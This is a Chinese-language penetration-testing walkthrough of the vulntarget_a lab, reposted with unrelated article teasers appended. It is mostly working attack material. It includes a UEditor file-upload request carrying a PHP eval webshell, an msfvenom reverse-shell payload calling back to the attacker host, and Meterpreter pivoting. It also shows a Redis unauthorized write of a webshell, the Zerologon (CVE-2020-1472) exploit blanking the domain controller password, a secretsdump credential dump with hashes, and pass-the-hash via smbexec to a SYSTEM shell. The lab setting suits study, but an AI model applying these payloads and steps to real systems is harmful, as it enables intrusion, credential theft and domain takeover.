vulntarget_a 訓練筆記

win 7 權限

利用任意文件上傳 getshell

POST /module/ueditor/php/action_upload.php?action=uploadfile HTTP/1.1
User-Agent: Mozilla/5.0 (compatible; Baiduspider/2.0; http://www.baidu.com/search/spider.html)
Accept: */*
Accept-Language: zh-CN,zh;q=0.9
Connection: keep-alive
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarymVk33liI64J7GQaK
Cache-Control: no-cache
Pragma: no-cache
Host: 192.168.159.129
Content-Length: 882------WebKitFormBoundarymVk33liI64J7GQaK
Content-Disposition: form-data; name="CONFIG[fileFieldName]"filename
------WebKitFormBoundarymVk33liI64J7GQaK
Content-Disposition: form-data; name="CONFIG[fileMaxSize]"10000
------WebKitFormBoundarymVk33liI64J7GQaK
Content-Disposition: form-data; name="CONFIG[filePathFormat]"R4g1729585588321
------WebKitFormBoundarymVk33liI64J7GQaK
Content-Disposition: form-data; name="CONFIG[fileAllowFiles][]".php
------WebKitFormBoundarymVk33liI64J7GQaK
Content-Disposition: form-data; name="mufile"submit
------WebKitFormBoundarymVk33liI64J7GQaK
Content-Disposition: form-data; name="filename"; filename="R4g1729585588321.php"R4g1729585588321<?php class Gz5SfY10 { public function __construct($H7Es8){ @eval("/*Z7y11Eib8N*/".$H7Es8.""); }}new Gz5SfY10($_REQUEST['cmd']);?>
------WebKitFormBoundarymVk33liI64J7GQaK--

?

?

?

?

當然工具直接梭哈也行

?win 2016 權限

將 win7 上線 cs 備用

cs木馬生成

設置監聽器

生成 exe 的木馬

?

用蟻劍傳輸后運行即可上線

?

redis 未授權 getshell

MSF上線

生成反向馬

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.159.128 LPORT=5555 -f exe > /root/555.exe

?

通過蟻劍上傳執行,msf 監聽

┌──(root?kali)-[~]
└─# msfconsole msf6 > use exploit/multi/handler
[*] Using configured payload generic/shell_reverse_tcp
msf6 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > set lhost 192.168.159.128
lhost => 192.168.159.128
msf6 exploit(multi/handler) > set lport 5555
lport => 5555
msf6 exploit(multi/handler) > run[*] Started reverse TCP handler on 192.168.159.128:5555 
[*] Sending stage (176198 bytes) to 192.168.159.129
[*] Meterpreter session 1 opened (192.168.159.128:5555 -> 192.168.159.129:56385) at 2024-10-23 20:11:15 +0800meterpreter > ls
Listing: C:\tmp
===============Mode              Size   Type  Last modified              Name
----              ----   ----  -------------              ----
100777/rwxrwxrwx  73802  fil   2024-10-23 20:06:58 +0800  555.exemeterpreter > bg
[*] Backgrounding session 1...
msf6 exploit(multi/handler) >

添加路由,設置代理,arp獲取到內網同網段IP

msf6 auxiliary(server/socks_proxy) > use post/multi/manage/autoroutemsf6 post(multi/manage/autoroute) > set session 1
session => 1msf6 post(multi/manage/autoroute) > run
[*] Running module against WIN7-PC
[*] Searching for subnets to autoroute.
[*] Did not find any new subnets to add.
[*] Post module execution completedmsf6 post(multi/manage/autoroute) > optionsModule options (post/multi/manage/autoroute):Name     Current Setting  Required  Description----     ---------------  --------  -----------CMD      autoadd          yes       Specify the autoroute command (Accepted: add, autoadd, print, delete, default)NETMASK  255.255.255.0    no        Netmask (IPv4 as "255.255.255.0" or CIDR as "/24"SESSION  1                yes       The session to run this module onSUBNET                    no        Subnet (IPv4, for example, 10.10.10.0)View the full module info with the info, or info -d command.msf6 post(multi/manage/autoroute) > use auxiliary/server/socks_proxy
msf6 auxiliary(server/socks_proxy) > optionsModule options (auxiliary/server/socks_proxy):Name     Current Setting  Required  Description----     ---------------  --------  -----------SRVHOST  0.0.0.0          yes       The local host or network interface to listen on. This must be an address on the local machine or0.0.0.0 to listen on all addresses.SRVPORT  1080             yes       The port to listen onVERSION  5                yes       The SOCKS version to use (Accepted: 4a, 5)When VERSION is 5:Name      Current Setting  Required  Description----      ---------------  --------  -----------PASSWORD                   no        Proxy password for SOCKS5 listenerUSERNAME                   no        Proxy username for SOCKS5 listenerAuxiliary action:Name   Description----   -----------Proxy  Run a SOCKS proxy serverView the full module info with the info, or info -d command.msf6 auxiliary(server/socks_proxy) > run
[*] Auxiliary module running as background job 3.
[*] Starting the SOCKS proxy servermsf6 auxiliary(server/socks_proxy) > sessions -i 1
[*] Starting interaction with 1...meterpreter > arp aARP cache
=========IP address       MAC address        Interface----------       -----------        ---------10.0.20.1        00:50:56:c0:00:0b  Intel(R) PRO/1000 MT Network Connection #210.0.20.99       00:0c:29:49:db:32  Intel(R) PRO/1000 MT Network Connection #210.0.20.254      00:50:56:f2:92:e5  Intel(R) PRO/1000 MT Network Connection #210.0.20.255      ff:ff:ff:ff:ff:ff  Intel(R) PRO/1000 MT Network Connection #2192.168.159.1    00:50:56:c0:00:08  Intel(R) PRO/1000 MT Network Connection192.168.159.2    00:50:56:f4:36:2d  Intel(R) PRO/1000 MT Network Connection192.168.159.128  00:0c:29:cc:f9:72  Intel(R) PRO/1000 MT Network Connection192.168.159.254  00:50:56:fe:c6:0b  Intel(R) PRO/1000 MT Network Connection192.168.159.255  ff:ff:ff:ff:ff:ff  Intel(R) PRO/1000 MT Network Connection224.0.0.22       00:00:00:00:00:00  Software Loopback Interface 1224.0.0.22       01:00:5e:00:00:16  Intel(R) PRO/1000 MT Network Connection224.0.0.22       01:00:5e:00:00:16  Intel(R) PRO/1000 MT Network Connection #2224.0.0.22       01:00:5e:00:00:16  Bluetooth ����(����������)224.0.0.252      00:00:00:00:00:00  Software Loopback Interface 1224.0.0.252      01:00:5e:00:00:fc  Intel(R) PRO/1000 MT Network Connection224.0.0.252      01:00:5e:00:00:fc  Intel(R) PRO/1000 MT Network Connection #2239.255.255.250  00:00:00:00:00:00  Software Loopback Interface 1239.255.255.250  01:00:5e:7f:ff:fa  Intel(R) PRO/1000 MT Network Connection239.255.255.250  01:00:5e:7f:ff:fa  Intel(R) PRO/1000 MT Network Connection #2255.255.255.255  ff:ff:ff:ff:ff:ff  Intel(R) PRO/1000 MT Network Connection255.255.255.255  ff:ff:ff:ff:ff:ff  Intel(R) PRO/1000 MT Network Connection #2255.255.255.255  ff:ff:ff:ff:ff:ff  Bluetooth ����(����������)

更改配置

vi  /etc/proxychains4.conf

?

代理之后,可以直接 redis 未授權訪問

利用redis未授權以及php web環境來getshell

redis未授權漏洞寫webshell

┌──(root?kali)-[~]
└─# proxychains redis-cli -h 10.0.20.99
[proxychains] config file found: /etc/proxychains4.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.17
[proxychains] Strict chain  ...  127.0.0.1:1080  ...  10.0.20.99:6379  ...  OK
10.0.20.99:6379> config set dir "C:/phpStudy/PHPTutorial/WWW/"
OK
10.0.20.99:6379> config set dbfilename tx.php
OK
10.0.20.99:6379> set 1 "<?php @eval($_POST['tx']);?>"
OK
10.0.20.99:6379> save
OK
10.0.20.99:6379> 

寫好shell之后,蟻劍設置代理連接

?

?

cs上線

右鍵 win7 選擇轉發上線

?

如圖選擇 payload 生成

?

?

設置完后會自動創建監聽器,并自動開啟監聽

?

?

win2019 權限獲取

msf 正向代理

通過代理啟動 msf,注意只有通過代理(proxychains msfconsole)才能使流量正向到內網win2016上

┌──(root?kali)-[/zbug]
└─# proxychains msfconsole[proxychains] config file found: /etc/proxychains4.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.17
Metasploit tip: After running db_nmap, be sure to check out the result 
of hosts and services
[proxychains] DLL init: proxychains-ng 4.17le.../                                               
[proxychains] DLL init: proxychains-ng 4.17msf6 > use exploit/multi/handler
[proxychains] DLL init: proxychains-ng 4.17
[*] Using configured payload generic/shell_reverse_tcp
[proxychains] DLL init: proxychains-ng 4.17msf6 exploit(multi/handler) > set payload windows/x64/meterpreter/bind_tcp
[proxychains] DLL init: proxychains-ng 4.17
payload => windows/x64/meterpreter/bind_tcp
[proxychains] DLL init: proxychains-ng 4.17msf6 exploit(multi/handler) > set lport 4444
[proxychains] DLL init: proxychains-ng 4.17
lport => 4444
[proxychains] DLL init: proxychains-ng 4.17msf6 exploit(multi/handler) > set rhost 10.0.20.99
[proxychains] DLL init: proxychains-ng 4.17
rhost => 10.0.20.99
[proxychains] DLL init: proxychains-ng 4.17msf6 exploit(multi/handler) > run
[proxychains] DLL init: proxychains-ng 4.17
[*] Started bind TCP handler against 10.0.20.99:4444
[proxychains] Strict chain  ...  127.0.0.1:1080  ...  10.0.20.99:4444 <--socket error or timeout!
[proxychains] Strict chain  ...  127.0.0.1:1080  ...  10.0.20.99:4444  ...  OK
[*] Sending stage (201798 bytes) to 10.0.20.99
[proxychains] DLL init: proxychains-ng 4.17
[*] Meterpreter session 1 opened (127.0.0.1:59614 -> 127.0.0.1:1080) at 2025-03-09 15:30:20 +0800
[proxychains] DLL init: proxychains-ng 4.17meterpreter > 

通過蟻劍運行即可

?

?

添加路由鏈

meterpreter >  run post/multi/manage/autoroute
[proxychains] DLL init: proxychains-ng 4.17[*] Running module against WIN2016
[*] Searching for subnets to autoroute.
[+] Route added to subnet 10.0.20.0/255.255.255.0 from host's routing table.
[proxychains] DLL init: proxychains-ng 4.17meterpreter > run post/windows/gather/enum_domain
[proxychains] DLL init: proxychains-ng 4.17
[+] Domain FQDN: vulntarget.com
[+] Domain NetBIOS Name: VULNTARGET
[+] Domain Controller: win2019.vulntarget.com (IP: 10.0.10.110)
[proxychains] DLL init: proxychains-ng 4.17meterpreter > bg
[proxychains] DLL init: proxychains-ng 4.17
[*] Backgrounding session 1...
[proxychains] DLL init: proxychains-ng 4.17msf6 exploit(multi/handler) > use auxiliary/server/socks_proxy
[proxychains] DLL init: proxychains-ng 4.17msf6 auxiliary(server/socks_proxy) > set version 5
[proxychains] DLL init: proxychains-ng 4.17
version => 5
[proxychains] DLL init: proxychains-ng 4.17msf6 auxiliary(server/socks_proxy) > set srvport 1081
[proxychains] DLL init: proxychains-ng 4.17
srvport => 1081
[proxychains] DLL init: proxychains-ng 4.17msf6 auxiliary(server/socks_proxy) > options
[proxychains] DLL init: proxychains-ng 4.17Module options (auxiliary/server/socks_proxy):Name     Current Setting  Required  Description----     ---------------  --------  -----------SRVHOST  0.0.0.0          yes       The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to listen on all addresses.SRVPORT  1081             yes       The port to listen onVERSION  5                yes       The SOCKS version to use (Accepted: 4a, 5)When VERSION is 5:Name      Current Setting  Required  Description----      ---------------  --------  -----------PASSWORD                   no        Proxy password for SOCKS5 listenerUSERNAME                   no        Proxy username for SOCKS5 listenerAuxiliary action:Name   Description----   -----------Proxy  Run a SOCKS proxy serverView the full module info with the info, or info -d command.[proxychains] DLL init: proxychains-ng 4.17msf6 auxiliary(server/socks_proxy) > run
[proxychains] DLL init: proxychains-ng 4.17
[*] Auxiliary module running as background job 0.
[proxychains] DLL init: proxychains-ng 4.17[*] Starting the SOCKS proxy server
msf6 auxiliary(server/socks_proxy) > 

這里配置完之后繼續配置代理文件

vi  /etc/proxychains4.conf

使用 nmap 測試是否連接成功

┌──(root?kali)-[/zbug]
└─# proxychains nmap -Pn -sT 10.0.10.110 -p6379,80,8080,445,139
[proxychains] config file found: /etc/proxychains4.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.17
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-03-09 18:56 CST
[proxychains] Strict chain  ...  0.0.0.0:1080  ...  0.0.0.0:1081  ...  10.0.10.110:139  ...  OK
[proxychains] Strict chain  ...  0.0.0.0:1080  ...  0.0.0.0:1081  ...  10.0.10.110:8080 <--socket error or timeout!
[proxychains] Strict chain  ...  0.0.0.0:1080  ...  0.0.0.0:1081  ...  10.0.10.110:80 <--socket error or timeout!
[proxychains] Strict chain  ...  0.0.0.0:1080  ...  0.0.0.0:1081  ...  10.0.10.110:445  ...  OK
[proxychains] Strict chain  ...  0.0.0.0:1080  ...  0.0.0.0:1081  ...  10.0.10.110:6379 <--socket error or timeout!
Nmap scan report for 10.0.10.110
Host is up (0.14s latency).PORT     STATE  SERVICE
80/tcp   closed http
139/tcp  open   netbios-ssn
445/tcp  open   microsoft-ds
6379/tcp closed redis
8080/tcp closed http-proxyNmap done: 1 IP address (1 host up) scanned in 45.37 seconds

CVE-2020-1472利用

git clone https://github.com/dirkjanm/CVE-2020-1472.git
git clone https://github.com/SecureAuthCorp/impacket.git && cd impacket && pip3 install .

下載完成后,利用用 cve-2020-1472 漏洞將域控密碼置空

┌──(root?kali)-[/zbug/CVE-2020-1472]
└─# proxychains python3 cve-2020-1472-exploit.py WIN2019 10.0.10.110 [proxychains] config file found: /etc/proxychains4.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.17
Performing authentication attempts...
[proxychains] Strict chain  ...  0.0.0.0:1080  ...  0.0.0.0:1081  ...  10.0.10.110:135  ...  OK
[proxychains] Strict chain  ...  0.0.0.0:1080  ...  0.0.0.0:1081  ...  10.0.10.110:49670  ...  OK
=========================================================================================================================
Target vulnerable, changing account password to empty stringResult: 0Exploit complete!

使用 secretsdump.py? 嘗試獲取 administrator 域控的 hash 值,此文件在 impacket/examples 目錄下

┌──(root?kali)-[/zbug/impacket/examples]
└─# proxychains4 python3 secretsdump.py  vulntarget.com/WIN2019\$@10.0.10.110  -just-dc  -no-pass[proxychains] config file found: /etc/proxychains4.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.17
Impacket v0.13.0.dev0+20250307.160229.6e0a9691 - Copyright Fortra, LLC and its affiliated companies [proxychains] Strict chain  ...  0.0.0.0:1080  ...  0.0.0.0:1081  ...  10.0.10.110:445  ...  OK
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
[proxychains] Strict chain  ...  0.0.0.0:1080  ...  0.0.0.0:1081  ...  10.0.10.110:135  ...  OK
[proxychains] Strict chain  ...  0.0.0.0:1080  ...  0.0.0.0:1081  ...  10.0.10.110:49667  ...  OK
Administrator:500:aad3b435b51404eeaad3b435b51404ee:c7c654da31ce51cbeecfef99e637be15:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:a3dd8e4a352b346f110b587e1d1d1936:::
vulntarget.com\win2016:1601:aad3b435b51404eeaad3b435b51404ee:dfc8d2bfa540a0a6e2248a82322e654e:::
WIN2019$:1000:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
WIN2016$:1602:aad3b435b51404eeaad3b435b51404ee:9630d035ba860e59ca7a51ea39a48e97:::
[*] Kerberos keys grabbed
Administrator:aes256-cts-hmac-sha1-96:70a1edb09dbb1b58f1644d43fa0b40623c014b690da2099f0fc3a8657f75a51d
Administrator:aes128-cts-hmac-sha1-96:04c435638a00755c0b8f12211d3e88a1
Administrator:des-cbc-md5:dcc29476a789ec9e
krbtgt:aes256-cts-hmac-sha1-96:f7a968745d4f201cbeb73f4b1ba588155cfd84ded34aaf24074a0cfe95067311
krbtgt:aes128-cts-hmac-sha1-96:f401ac35dc1c6fa19b0780312408cded
krbtgt:des-cbc-md5:10efae67c7026dbf
vulntarget.com\win2016:aes256-cts-hmac-sha1-96:e4306bef342cd8215411f9fc38a063f5801c6ea588cc2fee531342928b882d61
vulntarget.com\win2016:aes128-cts-hmac-sha1-96:6da7e9e046c4c61c3627a3276f5be855
vulntarget.com\win2016:des-cbc-md5:6e2901311c32ae58
WIN2019$:aes256-cts-hmac-sha1-96:092c877c3b20956347d535d91093bc1eb16b486b630ae2d99c0cf15da5db1390
WIN2019$:aes128-cts-hmac-sha1-96:0dca147d2a216089c185d337cf643e25
WIN2019$:des-cbc-md5:01c8894f541023bc
WIN2016$:aes256-cts-hmac-sha1-96:9173b992970cde4cf92795ea2f57c82fc72752e261eb3f6db7fd385500da709a
WIN2016$:aes128-cts-hmac-sha1-96:2fdb26ae937ab6b24e0931ac928ab960
WIN2016$:des-cbc-md5:8cce51314fb95761
[*] Cleaning up... 

成功獲取

Administrator:500:aad3b435b51404eeaad3b435b51404ee:c7c654da31ce51cbeecfef99e637be15:::

相同目錄下使用 smbexec.py? 拿域控shell

┌──(root?kali)-[/zbug/impacket/examples]
└─# proxychains python3 smbexec.py -hashes aad3b435b51404eeaad3b435b51404ee:c7c654da31ce51cbeecfef99e637be15 administrator@10.0.10.110
[proxychains] config file found: /etc/proxychains4.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.17
Impacket v0.13.0.dev0+20250307.160229.6e0a9691 - Copyright Fortra, LLC and its affiliated companies [proxychains] Strict chain  ...  0.0.0.0:1080  ...  0.0.0.0:1081  ...  10.0.10.110:445  ...  OK
[!] Launching semi-interactive shell - Careful what you execute
C:\Windows\system32>whoami
nt authority\system

本文來自互聯網用戶投稿,該文觀點僅代表作者本人,不代表本站立場。本站僅提供信息存儲空間服務,不擁有所有權,不承擔相關法律責任。
如若轉載,請注明出處:http://www.pswp.cn/diannao/75814.shtml
繁體地址,請注明出處:http://hk.pswp.cn/diannao/75814.shtml
英文地址,請注明出處:http://en.pswp.cn/diannao/75814.shtml

如若內容造成侵權/違法違規/事實不符,請聯系多彩編程網進行投訴反饋email:809451989@qq.com,一經查實,立即刪除!

相關文章

無人機螺旋槳平衡標準

螺旋槳平衡是確保無人機(UAV)平穩運行、可靠性和使用壽命的關鍵過程。螺旋槳的不平衡會導致振動、噪音&#xff0c;并加速關鍵部件的磨損&#xff0c;從而對飛行性能產生負面影響。 ISO 21940-11:2016標準為旋翼平衡提供了一個廣泛引用的框架&#xff0c;定義了可接受的不平衡…

既生瑜何生亮?Nginx RTMP 模塊與 SRS RTMP服務器技術對比

在實時視頻流的場景中&#xff0c;RTMP 協議作為一種傳統且高效的流媒體傳輸協議&#xff0c;廣泛應用于各類直播和點播系統。兩款流行的開源 RTMP 服務器分別是基于 Nginx 的 Nginx RTMP 模塊 和 SRS&#xff08;Simple Real-Time Server&#xff09;。這兩者都在流媒體行業有…

MATLAB 批量移動 TIF 文件至分類文件夾

文章目錄 前言一、步驟二、代碼 前言 本代碼用于從指定的源文件夾 (sourceFolder) 中篩選所有 .tif 文件&#xff0c;并根據文件名的特定關鍵詞&#xff08;Daynight 和 FDI&#xff09;將其分類移動到相應的目標文件夾 (targetDaynightFolder 和 targetFDIFolder)。 一、步驟…

重溫Ubuntu 24.04 LTS

用戶調整 # 創建新用戶 sudo adduser newusername # 設置新用戶的密碼 sudo passwd newusername # 將新用戶添加到 sudo 組 sudo usermod -aG sudo newusername # 修改ssh訪問權限 sudo nano /etc/ssh/sshd_config # 將新用戶加入&#xff0c;此時root將無法訪問 AllowUsers n…

AWS Lambda 集成更新詳解:打造無縫云函數體驗

引言 AWS Lambda 作為一種無服務器計算服務,讓開發者能夠運行代碼而無需配置或管理服務器。隨著 AWS 不斷優化其服務,Lambda 的集成方式也在不斷更新和改進。本文將深入探討 Lambda 的最新集成選項,幫助您充分利用這一強大的無服務器計算平臺。 Lambda 集成類型概述 從圖…

基于Kubernetes部署Prometheus監控平臺

#作者&#xff1a;stackofumbrella 文章目錄 prometheus和k8s集群版本對照表架構Prometheus Operator簡介kube-prometheus下載地址 安裝修改鏡像地址修改Prometheus的service修改Grafana的service修改Alertmanager的service數據持久化執行安裝 Prometheus驗證Grafana驗證解決C…

Android之uCrop (裁剪) 的基本使用資料

Android 拍照、選擇圖片并裁剪 uCrop裁剪 uCrop裁剪2 uCrop裁剪3 1.權限檢查 private static final int REQUEST_CAMERA_PERMISSION 333; private void requestCameraPermission() {if (ContextCompat.checkSelfPermission(this, android.Manifest.permission.CAMERA)! …

STM32基礎教程——輸入捕獲模式測量PWM頻率

目錄 前言 技術實現 原理圖 連線圖 代碼實現 內容要點 PWM基本結構 開啟外設時鐘 配置GPIO端口 配置時基單元 初始化輸出比較單元 輸出比較通道重映射 輸入捕獲功能初始化 計算捕獲PWM的頻率 實驗結果 問題記錄 前言 IC&#xff08;Input Capture&#xff09;輸…

基于網啟PXE服務器的批量定制系統平臺(詳細版)

項目說明 該項目共分為2個子項目&#xff0c;由iventoy和定制安裝兩部分組成 該項目旨在復習鞏固系統服務部署使用、shell編程等知識&#xff0c;旨在讓學生增加知識面&#xff0c;提高項目實習經歷&#xff0c;充實簡歷 項目背景&#xff1a; 公司新購了一批服務器和臺式機…

旅游CMS選型:WordPress、Joomla與Drupal對比

內容概要 在旅游行業數字化轉型進程中&#xff0c;內容管理系統&#xff08;CMS&#xff09;的選擇直接影響網站運營效率與用戶體驗。WordPress、Joomla和Drupal作為全球主流的開源CMS平臺&#xff0c;其功能特性與行業適配性存在顯著差異。本文將從旅游企業核心需求出發&…

el-table下的復選框關聯勾選

效果展示&#xff1a; <el-table style"height: 500px;" :data"tableData" border empty-text"暫無數據" v-loading"loading":header-cell-style"{ text-align: center }" :cell-style"{ text-align: center }"…

解決Cubemx生產的 .ioc文件不能外部打開的方法

正常來說&#xff0c;cubemx生成的文件會有圖標 但是當圖標白色的時候&#xff0c;無法通過直接點擊這個文件進入cubemx 1.首先檢查java環境是不是裝的JAVA8&#xff0c;如果是的話進行第二步操作&#xff1b; 2.重新安裝一次cubemx&#xff0c;在安裝的時候選擇為我安裝&…

從零構建大語言模型全棧開發指南:第三部分:訓練與優化技術-3.1.3分布式數據加載與并行處理(PyTorch DataLoader優化)

?? 點擊關注不迷路 ?? 點擊關注不迷路 ?? 點擊關注不迷路 文章大綱 3.1.3 分布式數據加載與并行處理(`PyTorch DataLoader`優化)1. 大規模數據加載的挑戰與瓶頸分析1.1 數據加載流程的時間分解2. PyTorch DataLoader的深度優化策略2.1 核心參數調優2.2 分布式數據分片策…

K8S學習之基礎五十七:部署代碼掃描工具sonarqube

部署代碼掃描工具sonarqube 拉取postgres、sonarqube鏡像&#xff0c;在harbor上創建postgres、sonarqube項目&#xff0c;將鏡像上傳至harbordocker pull postgres docker pull sonarqube docker tat postgres:latest 172.16.80.140/postgres/postgres:latest docker tat sona…

RAG技術的進化:RQ-RAG查詢優化/化繁為簡Adaptive-RAG智能分類/精準出擊

嘿,親愛的算法探險家們!歡迎來到RAG技術的“奇幻冒險”之旅!?? 今天,咱們要一起探索的是如何讓大語言模型(LLM)從“呆萌小學生”進化成“機智博士生”的奇妙旅程! 想象一下,你正在和一個超級聰明的AI聊天,但它有時候會像個小迷糊,回答得讓你哭笑不得。這時候,RAG…

11:00開始面試,11:08就出來了,問的問題有點變態。。。

從小廠出來&#xff0c;沒想到在另一家公司又寄了。 到這家公司開始上班&#xff0c;加班是每天必不可少的&#xff0c;看在錢給的比較多的份上&#xff0c;就不太計較了。沒想到8月一紙通知&#xff0c;所有人不準加班&#xff0c;加班費不僅沒有了&#xff0c;薪資還要降40%…

滲透測試中發現ak/sk泄露時的驗證工具

項目地址&#xff1a;https://github.com/libaibaia/cloudsec啟動命令&#xff1a;java -jar cloudSec-1.2.2-SNAPSHOT.jar 訪問&#xff1a;http://localhost:8000/#/admin/login 默認用戶名密碼&#xff1a;admin/admin123 注&#xff1a;8000 端口運行&#xff0c;如占用先…

【藍橋杯】重點沖刺

【最高優先級】必考核心算法(占分60%以上) 動態規劃(DP) ?????? 背包問題:01背包、完全背包(必須掌握空間優化的一維寫法) 線性DP:最長上升子序列(LIS)、最長公共子序列(LCS) 路徑問題:網格路徑計數(含障礙物)、最小路徑和 經典模型:打家劫舍、股票買賣問…

藍橋杯python編程每日刷題 day 20

題目&#xff1a; 給定一個長度為 N 的整數序列&#xff1a;A1, A2, , AN。現在你有一次機會&#xff0c;將其中連續的 K 個數修改成任意一個相同值。請你計算如何修改可以使修改后的數列的最長不下降子序列最長&#xff0c;請輸出這個最長的長度。 最長不下降子序列是指…

游戲引擎學習第185天

回顧并計劃今天的內容 我們完成了開始整理這些數據的工作&#xff0c;但我們還沒有機會真正去查看這些數據的具體內容&#xff0c;因為我們只是剛剛開始了數據整理的基本工作。我們收集了大量的信息&#xff0c;但到目前為止&#xff0c;仍然沒有足夠的可視化工具來幫助我們理…